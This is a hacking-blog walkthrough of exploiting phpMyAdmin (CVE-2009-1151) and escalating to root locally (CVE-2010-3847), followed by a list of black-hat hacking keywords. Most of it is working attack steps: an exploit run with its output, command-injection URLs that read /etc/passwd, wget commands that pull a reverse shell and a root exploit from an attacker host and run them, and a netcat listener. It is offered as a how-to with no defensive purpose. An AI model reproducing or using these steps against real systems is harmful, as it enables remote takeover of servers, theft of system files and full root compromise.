PHP MY ADMIN sql injection vulnerability
PHP MY ADMIN Sql injection vulnerability on version 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
PHPMYADMIN SQL INJECTIONCVE: CVE-2009-1151
Remote: Yes
Local: No
ROOT
CVE-2010-3847
Remote: No
Local: Yes
Donwload the get_root exploit from http://seclists.org/fulldisclosure/2010/Oct/257
1) Run the exploit against the target machine.
[root@bt]# ./php_exploit http://mytargettest.com/phpMyAdmin/
[+] checking if phpMyAdmin exists on URL provided …
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() …
[+] success! phpinfo() injected successfully! output saved on /tmp/exploit.29597.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
http://mytargettest.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com
2) Great, that means it worked, now you can type commands on the target machine.
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/var
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=cat+/etc/passwd
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=touch+/tmp/test
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/tmp/test ( Make sure you can write in there and the file is there.
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell (Download your rev_shell)
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=chmod+777+/tmp/airwolf_reverse_shell (change the permissions to execute)
3) Now you have your exploit in the target machine ready to run, this exploit is just a reverse shell
so, in my machine I run this :
nc -l -p 8080 -vvv
4) Now I execute my reverse shell to connect to my machine
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=/tmp/airwolf_reverse_shell
5) Great, now you have a shell, next step is get root.
id
6) cd /tmp/ ; mkdir hack ; cd hack
wget http://172.16.1.79/exploits/get_root
wget http://172.16.1.79/exploits/payload.c
7) Run the exploit to get root and that’s it.
chmod +x ./get_root
./get_root
id
Keywords:-
Hacking By Navdeep Singh, Hackers Blog, Black Hat Hacker,
Hackers, hacking, Hacking News Blog, Free Hacking Study, Best Hacking Institute, Xss, Cross Site Scripting, Stored XSS, How To Hack, Hacking Book, Hacking Tools, Hacking Tutorials, Windows Hacking, Advance System Hacking, Website Hacking, Hacking News, Hackers News, The Hackers News
Mobile Hacking, Games Hacking, Android Hacking, Facebook Hacking, Google Hacking, Google Dorks, Email Hacking, Virus, Gmail Hacking, Whats App Hacking, Ip Changer, Ip Hide, tor, Cracking Tools, email hacking, Android Tools For Hacker, Mobile Game Hacking, Pc Game hacking, Facebook Trick, Clickjacking, Metasploit Tutorial, phising, phising attack, Keylogger Tutorial, Keylogger, KALI AND BACKTRACK, KALI AND BACKTRACK Tutorial, Web Hacking, Sqli, Sql Injection, Sqli Cheat Sheet, Sqli Admin Bypass, Wifi Hacking, Wifi Password Hacking
PHP MY ADMIN sql injection vulnerability
Reviewed by Unknown
on
12/09/2015
Rating: